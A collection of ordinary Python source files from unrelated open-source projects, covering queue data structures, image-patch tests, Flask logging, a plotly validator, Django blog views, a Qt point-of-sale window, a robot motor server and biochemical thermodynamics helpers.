"""Extend the queue by a number of elements.
Parameters
----------
items : list
A list of items.
"""
for item in items:
self.push(item)
def get(self, item):
"""Return the element in the queue identical to `item`.
Parameters
----------
item :
The element to search for.
Returns
-------
The element in the queue identical to `item`. If the element
was not found, None is returned.
"""
try:
index = self._queue.index(item)
return self._queue[index]
except Exception:
return None
def remove(self, item):
"""Remove an element from the queue.
Parameters
----------
item :
The element to remove.
"""
self._queue.remove(item)
class FIFOQueue(Queue):
"""The first-in-first-out (FIFO) queue.
In a FIFO queue the first element added to the queue
is the first element to be removed.
Examples
--------
>>> q = FIFOQueue()
>>> q.push(5)
>>> q.extend([1, 3, 7])
>>> print(q)
[5, 1, 3, 7]
Retrieving an element:
>>> q.pop()
5
Removing an element:
>>> q.remove(3)
>>> print(q)
[1, 7]
Get the element in the queue identical to the given item:
>>> q.get(7)
7
Check if the queue is empty:
>>> q.empty()
False
Loop over the elements in the queue:
>>> for x in q:
...     print(x)
1
7
Check if an element is in the queue:
>>> if 7 in q:
...     print("yes")
yes
See Also
--------
:class:`PriorityQueue`
"""
def __init__(self):
super(FIFOQueue, self).__init__()
def push(self, item):
"""Push an element to the end of the queue.
Parameters
----------
item :
The element to append.
"""
self._queue.append(item)
def pop(self):
"""Return the element at the front of the queue.
Returns
-------
The first element in the queue.
"""
return self._queue.pop(0)
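# An aside: list.pop(0) is O(n) because the remaining elements shift left;
# if throughput matters, collections.deque.popleft() would be an O(1)
# drop-in alternative (a design note, not a behavior change).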
def extend(self, items):
"""Append a list of elements at the end of the queue.
Parameters
----------
items : list
List of elements.
"""
self._queue.extend(items)
class PriorityQueue(Queue):
"""
The priority queue.
In a priority queue each element has a priority associated with it. An element
with high priority (i.e., smallest value) is served before an element with low priority
(i.e., largest value). The priority queue is implemented with a heap.
Parameters
----------
func : callable
A callback function handling the priority. By default the priority
is the value of the element.
Examples
--------
>>> q = PriorityQueue()
>>> q.push(5)
>>> q.extend([1, 3, 7])
>>> print(q)
[(1,1), (5,5), (3,3), (7,7)]
Retrieving the element with highest priority:
>>> q.pop()
1
Removing an element:
>>> q.remove((3, 3))
>>> print(q)
[(5,5), (7,7)]
Get the element in the queue identical to the given item:
>>> q.get(7)
7
Check if the queue is empty:
>>> q.empty()
False
Loop over the elements in the queue:
>>> for x in q:
...     print(x)
(5, 5)
(7, 7)
Check if an element is in the queue:
>>> if 7 in q:
...     print("yes")
yes
See Also
--------
:class:`FIFOQueue`
"""
def __init__(self, func=lambda x: x):
super(PriorityQueue, self).__init__()
self.func = func
def __contains__(self, item):
for _, element in self._queue:
if item == element:
return True
return False
def __str__(self):
return '[' + ', '.join('({},{})'.format(*el) for el in self._queue) + ']'
def push(self, item):
"""Push an element on the priority queue.
The element is pushed on the priority queue according
to its priority.
Parameters
----------
item :
The element to push on the queue.
"""
heapq.heappush(self._queue, (self.func(item), item))
def pop(self):
"""Get the element with the highest priority.
Get the element with the highest priority (i.e., smallest value).
Returns
-------
The element with the highest priority.
"""
return heapq.heappop(self._queue)[1]
def get(self, item):
"""Return the element in the queue identical to `item`.
Parameters
----------
item :
The element to search for.
Returns
-------
The element in the queue identical to `item`. If the element
was not found, None is returned.
"""
for _, element in self._queue:
if item == element:
return element
return None
def remove(self, item):
"""Remove an element from the queue.
Parameters
----------
item :
The element to remove.
"""
super(PriorityQueue, self).remove(item)
heapq.heapify(self._queue)
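# A minimal extra usage sketch for the `func` callback (assumes numeric
# items): negating the key turns this into a max-priority queue.
# >>> q = PriorityQueue(func=lambda x: -x)
# >>> q.extend([1, 3, 7])
# >>> q.pop()
# 7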
|
ctgk/BayesianNetwork
|
test/image/test_util.py
|
import unittest
import numpy as np
from bayesnet.image.util import img2patch, patch2img
class TestImg2Patch(unittest.TestCase):
def test_img2patch(self):
img = np.arange(16).reshape(1, 4, 4, 1)
patch = img2patch(img, size=3, step=1)
expected = np.asarray([
[img[0, 0:3, 0:3, 0], img[0, 0:3, 1:4, 0]],
[img[0, 1:4, 0:3, 0], img[0, 1:4, 1:4, 0]]
])
expected = expected[None, ..., None]
self.assertTrue((patch == expected).all())
imgs = [
np.random.randn(2, 5, 6, 3),
np.random.randn(3, 10, 10, 2),
np.random.randn(1, 23, 17, 5)
]
sizes = [
(1, 1),
2,
(3, 4)
]
steps = [
(1, 2),
(3, 1),
3
]
shapes = [
(2, 5, 3, 1, 1, 3),
(3, 3, 9, 2, 2, 2),
(1, 7, 5, 3, 4, 5)
]
for img, size, step, shape in zip(imgs, sizes, steps, shapes):
self.assertEqual(shape, img2patch(img, size, step).shape)
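# The expected shapes above follow the sliding-window relation
# out = (in - size) // step + 1 per spatial axis (a sketch of the assumed
# convention; scalar size/step broadcast to both axes). E.g. for img
# (2, 5, 6, 3) with size (1, 1) and step (1, 2):
# out_h = (5-1)//1 + 1 = 5 and out_w = (6-1)//2 + 1 = 3, giving (2, 5, 3, 1, 1, 3).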
class TestPatch2Img(unittest.TestCase):
def test_patch2img(self):
img = np.arange(16).reshape(1, 4, 4, 1)
patch = img2patch(img, size=2, step=2)
self.assertTrue((img == patch2img(patch, (2, 2), (1, 4, 4, 1))).all())
patch = img2patch(img, size=3, step=1)
expected = np.arange(0, 32, 2).reshape(1, 4, 4, 1)
expected[0, 0, 0, 0] /= 2
expected[0, 0, -1, 0] /= 2
expected[0, -1, 0, 0] /= 2
expected[0, -1, -1, 0] /= 2
expected[0, 1:3, 1:3, 0] *= 2
self.assertTrue((expected == patch2img(patch, (1, 1), (1, 4, 4, 1))).all())
if __name__ == '__main__':
unittest.main()
|
Kbman99/NetSecShare
|
app/logger_setup.py
|
'''
logger_setup.py customizes the app's logging module. Each time an event is
logged the logger checks the level of the event (eg. debug, warning, info...).
If the event is above the approved threshold then it goes through. The handlers
do the same thing; they output to a file/shell if the event level is above their
threshold.
:Example:
>> from website import logger
>> logger.info('event', foo='bar')
**Levels**:
- logger.debug('For debugging purposes')
- logger.info('An event occurred, for example a database update')
- logger.warning('Rare situation')
- logger.error('Something went wrong')
- logger.critical('Very very bad')
You can build a log incrementally as so:
>> log = logger.new(date='now')
>> log = log.bind(weather='rainy')
>> log.info('user logged in', user='John')
'''
import datetime as dt
import logging
from logging.handlers import RotatingFileHandler
import pytz
from flask import request, session
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from app import app
# Set the logging level
app.logger.setLevel(app.config['LOG_LEVEL'])
# Remove the stdout handler
app.logger.removeHandler(app.logger.handlers[0])
TZ = pytz.timezone(app.config['TIMEZONE'])
def add_fields(_, level, event_dict):
''' Add custom fields to each record. '''
now = dt.datetime.now()
#event_dict['timestamp'] = TZ.localize(now, True).astimezone(pytz.utc).isoformat()
event_dict['timestamp'] = TZ.localize(now, True).astimezone\
(pytz.timezone(app.config['TIMEZONE'])).strftime(app.config['TIME_FMT'])
event_dict['level'] = level
if request:
try:
#event_dict['ip_address'] = request.headers['X-Forwarded-For'].split(',')[0].strip()
event_dict['ip_address'] = request.headers.get('X-Forwarded-For', request.remote_addr)
#event_dict['ip_address'] = request.header.get('X-Real-IP')
except:
event_dict['ip_address'] = 'unknown'
return event_dict
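# With these processors each record is rendered as one JSON object, roughly
# of the form (field names as produced by add_fields above; a sketch):
# {"event": "user logged in", "user": "John", "level": "info",
#  "timestamp": "...", "ip_address": "..."}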
# Add a handler to write log messages to a file
if app.config.get('LOG_FILE'):
file_handler = RotatingFileHandler(filename=app.config['LOG_FILENAME'],
maxBytes=app.config['LOG_MAXBYTES'],
backupCount=app.config['LOG_BACKUPS'],
mode='a',
encoding='utf-8')
file_handler.setLevel(logging.DEBUG)
app.logger.addHandler(file_handler)
# Wrap the application logger with structlog to format the output
logger = wrap_logger(
app.logger,
processors=[
add_fields,
JSONRenderer(indent=None)
]
)
|
plotly/plotly.py
|
packages/python/plotly/plotly/validators/scattersmith/_textfont.py
|
import _plotly_utils.basevalidators
class TextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="textfont", parent_name="scattersmith", **kwargs):
super(TextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Textfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
""",
),
**kwargs
)
|
our-iot-project-org/pingow-web-service
|
src/posts/views.py
|
from django.core import serializers
from rest_framework.response import Response
from django.http import JsonResponse
try:
from urllib import quote_plus # python 2
except ImportError:
from urllib.parse import quote_plus # python 3
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from comments.forms import CommentForm
from comments.models import Comment
from .forms import PostForm
from .models import Post
def post_create(request):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
form = PostForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_form.html", context)
def post_detail(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except (TypeError, ValueError):
parent_id = None
if parent_id:
parent_qs = Comment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = Comment.objects.get_or_create(
user=request.user,
content_type=content_type,
object_id=obj_id,
content=content_data,
parent=parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form": form,
}
return render(request, "post_detail.html", context)
def post_list(request):
today = timezone.now().date()
queryset_list = Post.objects.active() # .order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = Post.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query) |
Q(content__icontains=query) |
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 8) # Show 8 posts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "post_list.html", context)
def post_update(request, slug=None):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
instance = get_object_or_404(Post, slug=slug)
form = PostForm(request.POST or None,
request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved",
extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form": form,
}
return render(request, "post_form.html", context)
def post_delete(request, slug=None):
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
instance = get_object_or_404(Post, slug=slug)
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:list")
|
joshuamsmith/ConnectPyse
|
sales/order.py
|
from ..cw_model import CWModel
class Order(CWModel):
def __init__(self, json_dict=None):
self.id = None # (Integer)
self.company = None # *(CompanyReference)
self.contact = None # (ContactReference)
self.phone = None # (String)
self.phoneExt = None # (String)
self.email = None # (String)
self.site = None # (SiteReference)
self.status = None # *(OrderStatusReference)
self.opportunity = None # (OpportunityReference)
self.orderDate = None # (String)
self.dueDate = None # (String)
self.billingTerms = None # (BillingTermsReference)
self.taxCode = None # (TaxCodeReference)
self.poNumber = None # (String(50))
self.locationId = None # (Integer)
self.businessUnitId = None # (Integer)
self.salesRep = None # *(MemberReference)
self.notes = None # (String)
self.billClosedFlag = None # (Boolean)
self.billShippedFlag = None # (Boolean)
self.restrictDownpaymentFlag = None # (Boolean)
self.description = None # (String)
self.topCommentFlag = None # (Boolean)
self.bottomCommentFlag = None # (Boolean)
self.shipToCompany = None # (CompanyReference)
self.shipToContact = None # (ContactReference)
self.shipToSite = None # (SiteReference)
self.billToCompany = None # (CompanyReference)
self.billToContact = None # (ContactReference)
self.billToSite = None # (SiteReference)
self.productIds = None # (Integer[])
self.documentIds = None # (Integer[])
self.invoiceIds = None # (Integer[])
self.configIds = None # (Integer[])
self.total = None # (Number)
self.taxTotal = None # (Number)
self._info = None # (Metadata)
# initialize object with json dict
super().__init__(json_dict)
|
coinbox/coinbox-mod-base
|
cbmod/base/views/window.py
|
from pydispatch import dispatcher
from PySide import QtCore, QtGui
import cbpos
logger = cbpos.get_logger(__name__)
from .page import BasePage
class MainWindow(QtGui.QMainWindow):
__inits = []
def __init__(self):
super(MainWindow, self).__init__()
self.tabs = QtGui.QTabWidget(self)
self.tabs.setTabsClosable(False)
self.tabs.setIconSize(QtCore.QSize(32, 32))
self.tabs.currentChanged.connect(self.onCurrentTabChanged)
self.toolbar = self.addToolBar('Base')
self.toolbar.setIconSize(QtCore.QSize(48,48)) #Suitable for touchscreens
self.toolbar.setObjectName('BaseToolbar')
toolbarStyle = cbpos.config['menu', 'toolbar_style']
# The index in this list is the same as that in the configuration page
available_styles = (
QtCore.Qt.ToolButtonFollowStyle,
QtCore.Qt.ToolButtonIconOnly,
QtCore.Qt.ToolButtonTextOnly,
QtCore.Qt.ToolButtonTextBesideIcon,
QtCore.Qt.ToolButtonTextUnderIcon,
)
try:
toolbarStyle = available_styles[int(toolbarStyle)]
except (ValueError, TypeError, IndexError):
toolbarStyle = QtCore.Qt.ToolButtonFollowStyle
self.toolbar.setToolButtonStyle(toolbarStyle)
self.setCentralWidget(self.tabs)
self.statusBar().showMessage(cbpos.tr._('Coinbox POS is ready.'))
self.setWindowTitle('Coinbox')
self.callInit()
self.loadToolbar()
self.loadMenu()
def loadToolbar(self):
"""
Loads the toolbar actions, restore toolbar state, and restore window geometry.
"""
mwState = cbpos.config['mainwindow', 'state']
mwGeom = cbpos.config['mainwindow', 'geometry']
for act in cbpos.menu.actions:
# TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
action = QtGui.QAction(QtGui.QIcon(act.icon), act.label, self)
action.setShortcut(act.shortcut)
action.triggered.connect(act.trigger)
self.toolbar.addAction(action)
#Restores the saved mainwindow's toolbars and docks, and then the window geometry.
if mwState is not None:
self.restoreState( QtCore.QByteArray.fromBase64(mwState) )
if mwGeom is not None:
self.restoreGeometry( QtCore.QByteArray.fromBase64(mwGeom) )
else:
self.setGeometry(0, 0, 800, 600)
def loadMenu(self):
"""
Load the menu root items and items into the QTabWidget with the appropriate pages.
"""
show_empty_root_items = cbpos.config['menu', 'show_empty_root_items']
show_disabled_items = cbpos.config['menu', 'show_disabled_items']
hide_tab_bar = not cbpos.config['menu', 'show_tab_bar']
if hide_tab_bar:
# Hide the tab bar and prepare the toolbar for extra QAction's
self.tabs.tabBar().hide()
# This pre-supposes that the menu items will come after the actions
self.toolbar.addSeparator()
for root in cbpos.menu.items:
if not root.enabled and not show_disabled_items:
continue
if show_disabled_items:
# Show all child items
children = root.children
else:
# Filter out those which are disabled
children = [i for i in root.children if i.enabled]
# Hide empty menu root items
if len(children) == 0 and not show_empty_root_items:
continue
# Add the tab
widget = self.getTabWidget(children)
icon = QtGui.QIcon(root.icon)
index = self.tabs.addTab(widget, icon, root.label)
widget.setEnabled(root.enabled)
# Add the toolbar action if enabled
if hide_tab_bar:
# TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
action = QtGui.QAction(QtGui.QIcon(icon), root.label, self)
action.onTrigger = lambda n=index: self.tabs.setCurrentIndex(n)
action.triggered.connect(action.onTrigger)
self.toolbar.addAction(action)
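# The n=index default argument freezes the tab index at definition time;
# a plain `lambda: self.tabs.setCurrentIndex(index)` would late-bind and
# always jump to the last tab added by this loop.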
def onCurrentTabChanged(self, index, tabs=None):
if tabs is None:
tabs = self.tabs
widget = tabs.widget(index)
try:
signal = widget.shown
except AttributeError:
pass
else:
signal.emit()
def getTabWidget(self, items):
"""
Returns the appropriate window to be placed in the main QTabWidget,
depending on the number of children of a root menu item.
"""
count = len(items)
if count == 0:
# If there are no child items, just return an empty widget
widget = QtGui.QWidget()
widget.setEnabled(False)
return widget
elif count == 1:
# If there is only one item, show it as is.
logger.debug('Loading menu page for %s', items[0].name)
widget = items[0].page()
widget.setEnabled(items[0].enabled)
return widget
else:
# If there are many children, add them in a QTabWidget
tabs = QtGui.QTabWidget()
tabs.currentChanged.connect(lambda i, t=tabs: self.onCurrentTabChanged(i, t))
for item in items:
logger.debug('Loading menu page for %s', item.name)
widget = item.page()
icon = QtGui.QIcon(item.icon)
tabs.addTab(widget, icon, item.label)
widget.setEnabled(item.enabled)
return tabs
def saveWindowState(self):
"""
Saves the main window state (position, size, toolbar positions)
"""
mwState = self.saveState().toBase64()
mwGeom = self.saveGeometry().toBase64()
cbpos.config['mainwindow', 'state'] = unicode(mwState)
cbpos.config['mainwindow', 'geometry'] = unicode(mwGeom)
cbpos.config.save()
def closeEvent(self, event):
"""
Perform necessary operations before closing the window.
"""
self.saveWindowState()
#do any other thing before closing...
event.accept()
@classmethod
def addInit(cls, init):
"""
Adds the `init` method to the list of extensions of the `MainWindow.__init__`.
"""
cls.__inits.append(init)
def callInit(self):
"""
Handle calls to `__init__` methods of extensions of the MainWindow.
"""
for init in self.__inits:
init(self)
|
DailyActie/Surrogate-Model
|
01-codes/scipy-master/scipy/odr/setup.py
|
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join
def configuration(parent_package='', top_path=None):
import warnings
from numpy.distutils.misc_util import Configuration
from numpy.distutils.system_info import get_info, BlasNotFoundError
config = Configuration('odr', parent_package, top_path)
libodr_files = ['d_odr.f',
'd_mprec.f',
'dlunoc.f']
blas_info = get_info('blas_opt')
if blas_info:
libodr_files.append('d_lpk.f')
else:
warnings.warn(BlasNotFoundError.__doc__)
libodr_files.append('d_lpkbls.f')
odrpack_src = [join('odrpack', x) for x in libodr_files]
config.add_library('odrpack', sources=odrpack_src)
sources = ['__odrpack.c']
libraries = ['odrpack'] + blas_info.pop('libraries', [])
include_dirs = ['.'] + blas_info.pop('include_dirs', [])
config.add_extension('__odrpack',
sources=sources,
libraries=libraries,
include_dirs=include_dirs,
depends=(['odrpack.h'] + odrpack_src),
**blas_info
)
config.add_data_dir('tests')
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
HelsinkiHacklab/urpobotti
|
python/motorctrl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time
SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576
# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250
class motorserver(zmqdecorators.service):
def __init__(self, service_name, service_port, serialport):
super(motorserver, self).__init__(service_name, service_port)
self.serial_port = serialport
self.input_buffer = ""
self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
self.last_command_time = time.time()
self.pcb = ioloop_mod.PeriodicCallback(self.check_data_received, COMMAND_GRACE_TIME * 1000) # callback_time is in milliseconds
self.pcb.start()
def check_data_received(self, *args):
if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
self._setspeeds(0,0)
def _setspeeds(self, m1speed, m2speed):
self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))
@zmqdecorators.method()
def setspeeds(self, resp, m1speed, m2speed):
self.last_command_time = time.time()
#print("Got speeds %s,%s" % (m1speed, m2speed))
self._setspeeds(m1speed, m2speed)
# TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
resp.send("ACK")
def handle_serial_event(self, fd, events):
# Copied from arbus that was thread based
if not self.serial_port.inWaiting():
# Don't try to read if there is no data, instead sleep (yield) a bit
time.sleep(0)
return
data = self.serial_port.read(1)
if len(data) == 0:
return
#print("DEBUG: data=%s" % data)
# Put the data into the input buffer and check for CRLF
self.input_buffer += data
# Trim prefix NULLs and linebreaks
self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
#print "input_buffer=%s" % repr(self.input_buffer)
if ( len(self.input_buffer) > 1
and self.input_buffer[-2:] == "\r\n"):
# Got a message, parse it (sans the CRLF) and empty the buffer
self.message_received(self.input_buffer[:-2])
self.input_buffer = ""
def message_received(self, message):
#print("DEBUG: msg=%s" % message)
try:
# Currently we have no incoming messages from this board
pass
except Exception as e:
# Ignore parse errors, they just mean we could not parse the command
print("message_received exception: Got exception %s" % repr(e))
def cleanup(self):
print("Cleanup called")
self._setspeeds(0,0)
def run(self):
print("Starting motorserver")
super(motorserver, self).run()
if __name__ == "__main__":
import serial
import sys,os
port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
instance.run()
|
JamesJeffryes/MINE-Database
|
minedatabase/thermodynamics.py
|
"""Basic thermodynamic calculations for pickaxe."""
from typing import Union
import pint
from equilibrator_api import (
Q_,
ComponentContribution,
Reaction,
default_physiological_ionic_strength,
default_physiological_p_h,
default_physiological_p_mg,
default_physiological_temperature,
)
from equilibrator_api.phased_reaction import PhasedReaction
from equilibrator_assets.compounds import Compound
from equilibrator_assets.local_compound_cache import LocalCompoundCache
from equilibrator_cache.compound_cache import CompoundCache
from pymongo import MongoClient
from sqlalchemy import create_engine
from minedatabase.pickaxe import Pickaxe
class Thermodynamics:
"""Class to calculate thermodynamics of Pickaxe runs.
Thermodynamics allows for the calculation of:
1) Standard ∆G' of formation
2) Standard ∆G'o of reaction
3) Physiological ∆G'm of reaction
4) Adjusted ∆G' of reaction
eQuilibrator objects can also be obtained from r_ids and c_ids.
Attributes
----------
mongo_uri: str
URI of the mongo database.
client: MongoClient
Connection to Mongo.
CC: ComponentContribution
eQuilibrator Component Contribution object to calculate ∆G with.
lc: LocalCompoundCache
The local compound cache to generate eQuilibrator compounds from.
"""
def __init__(
self,
):
# Mongo params
self.mongo_uri = None
self.client = None
self._core = None
# eQ params
self.CC = ComponentContribution()
self.lc = None
self._water = None
def load_mongo(self, mongo_uri: Union[str, None] = None):
if mongo_uri:
self.mongo_uri = mongo_uri
self.client = MongoClient(mongo_uri)
else:
self.mongo_uri = "localhost:27017"
self.client = MongoClient()
self._core = self.client["core"]
def _all_dbs_loaded(self):
if self.client and self._core and self.lc:
return True
else:
print("Load connection to Mongo and eQuilibrator local cache.")
return False
def _eq_loaded(self):
if self.lc:
return True
else:
print("Load eQulibrator local cache.")
return False
def _reset_CC(self):
"""reset CC back to defaults"""
self.CC.p_h = default_physiological_p_h
self.CC.p_mg = default_physiological_p_mg
self.CC.temperature = default_physiological_temperature
self.CC.ionic_strength = default_physiological_ionic_strength
def load_thermo_from_postgres(
self, postgres_uri: str = "postgresql:///eq_compounds"
) -> None:
"""Load a LocalCompoundCache from a postgres uri for equilibrator.
Parameters
----------
postgres_uri : str, optional
uri of the postgres DB to use, by default "postgresql:///eq_compounds"
"""
self.lc = LocalCompoundCache()
self.lc.ccache = CompoundCache(create_engine(postgres_uri))
self._water = self.lc.get_compounds("O")
def load_thermo_from_sqlite(
self, sqlite_filename: str = "compounds.sqlite"
) -> None:
"""Load a LocalCompoundCache from a sqlite file for equilibrator.
compounds.sqlite can be generated through LocalCompoundCache's method
generate_local_cache_from_default_zenodo
Parameters
----------
sqlite_filename: str
filename of the sqlite file to load.
"""
self.lc = LocalCompoundCache()
self.lc.load_cache(sqlite_filename)
self._water = self.lc.get_compounds("O")
def get_eQ_compound_from_cid(
self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[Compound, None]:
"""Get an equilibrator compound for a given c_id from the core.
Attempts to retrieve a compound from the core or a specified db_name.
Parameters
----------
c_id : str
compound ID for MongoDB lookup of a compound.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for compound in before core database, by default None.
Returns
-------
equilibrator_assets.compounds.Compound
eQuilibrator Compound
"""
# Find locally in pickaxe
compound_smiles = None
if pickaxe:
if c_id in pickaxe.compounds:
compound_smiles = pickaxe.compounds[c_id]["SMILES"]
else:
return None
# Find in mongo db
elif self._all_dbs_loaded():
if db_name:
compound = self.client[db_name].compounds.find_one(
{"_id": c_id}, {"SMILES": 1}
)
if compound:
compound_smiles = compound["SMILES"]
# No cpd smiles from database name
if not compound_smiles:
compound = self._core.compounds.find_one({"_id": c_id}, {"SMILES": 1})
if compound:
compound_smiles = compound["SMILES"]
# No compound_smiles at all
if not compound_smiles or "*" in compound_smiles:
return None
else:
eQ_compound = self.lc.get_compounds(
compound_smiles, bypass_chemaxon=True, save_empty_compounds=True
)
return eQ_compound
def standard_dg_formation_from_cid(
self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[float, None]:
"""Get standard ∆Gfo for a compound.
Parameters
----------
c_id : str
Compound ID to get the ∆Gf for.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for compound in before core database, by default None.
Returns
-------
Union[float, None]
∆Gf'o for a compound, or None if unavailable.
"""
eQ_cpd = self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
if not eQ_cpd:
return None
dgf = self.CC.standard_dg_formation(eQ_cpd)
dgf = dgf[0]
return dgf
def get_eQ_reaction_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[PhasedReaction, None]:
"""Get an eQuilibrator reaction object from an r_id.
Parameters
----------
r_id : str
Reaction id to get object for.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
Database to look for reaction in.
Returns
-------
PhasedReaction
eQuilibrator reaction to calculate ∆Gr with.
"""
if pickaxe:
if r_id in pickaxe.reactions:
reaction_info = pickaxe.reactions[r_id]
else:
return None
elif db_name:
mine = self.client[db_name]
reaction_info = mine.reactions.find_one({"_id": r_id})
if not reaction_info:
return None
else:
return None
reactants = reaction_info["Reactants"]
products = reaction_info["Products"]
lhs = " + ".join(f"{r[0]} {r[1]}" for r in reactants)
rhs = " + ".join(f"{p[0]} {p[1]}" for p in products)
reaction_string = " => ".join([lhs, rhs])
compounds = set([r[1] for r in reactants])
compounds.update(tuple(p[1] for p in products))
eQ_compound_dict = {
c_id: self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
for c_id in compounds
}
if not all(eQ_compound_dict.values()):
return None
if "X73bc8ef21db580aefe4dbc0af17d4013961d9d17" not in compounds:
eQ_compound_dict["water"] = self._water
eq_reaction = Reaction.parse_formula(eQ_compound_dict.get, reaction_string)
return eq_reaction
def physiological_dg_prime_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[pint.Measurement, None]:
"""Calculate the ∆Gm' of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
Returns
-------
pint.Measurement
The calculated ∆G'm.
"""
eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
dGm_prime = self.CC.physiological_dg_prime(eQ_reaction)
return dGm_prime
def standard_dg_prime_from_rid(
self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
) -> Union[pint.Measurement, None]:
"""Calculate the ∆G'o of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
Returns
-------
pint.Measurement
The calculated ∆G'o.
"""
eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
dG0_prime = self.CC.standard_dg_prime(eQ_reaction)
return dG0_prime
def dg_prime_from_rid(
self,
r_id: str,
pickaxe: Pickaxe = None,
db_name: str = None,
p_h: Q_ = default_physiological_p_h,
p_mg: Q_ = default_physiological_p_mg,
ionic_strength: Q_ = default_physiological_ionic_strength,
) -> Union[pint.Measurement, None]:
"""Calculate the ∆G' of a reaction.
Parameters
----------
r_id : str
ID of the reaction to calculate.
pickaxe : Pickaxe
pickaxe object to look for the compound in, by default None.
db_name : str
MINE the reaction is found in.
p_h : Q_
pH of system.
p_mg: Q_
pMg of the system.
ionic_strength: Q_
ionic strength of the system.
Returns
-------
pint.Measurement
The calculated ∆G'.
"""
